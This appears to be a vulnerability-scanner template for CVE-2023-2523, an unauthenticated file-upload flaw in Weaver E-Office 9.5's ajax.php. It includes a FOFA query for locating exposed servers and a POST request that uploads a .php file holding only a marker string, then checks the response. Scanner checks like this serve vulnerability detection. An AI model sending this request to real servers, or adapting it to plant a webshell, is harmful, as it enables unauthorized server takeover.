product: 泛微 E-Office
vName: 泛微E-Office ajax.php文件上传漏洞
type: 文件上传
vID:
  - CVE-2023-2523
level: 3
vDesc: 泛微e-office 9.5版本，源文件 App/Ajax/ajax.php?response=mobile_upload_save 的一些未知功能存在问题。参数 upload_quwan 的操作导致不受限制的上传，未经身份验证的恶意攻击者通过上传恶意文件，从而获取目标服务器的控制权限。
version: 泛微 E-Office 9.5
note: ''
search:
  FOFA: app="泛微-EOffice"
protocol: http
link: https://blog.csdn.net/qq_41904294/article/details/130832416
fix: [ ]
model: ''
logic: and
exploit:
  - exp:
      method: post
      follow: false
      path: /E-mobile/App/Ajax/ajax.php?action=mobile_upload_save
      file:
        file:
          - ''
          - ''
          - application/octet-stream
        upload_quwan:
          - 52e039302a62d077.php
          - 95cc64dd2825f9df13ec4ad683ecf339
          - image/jpeg
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          body:
            value:
              - 52e039302a62d077.php
            logic: and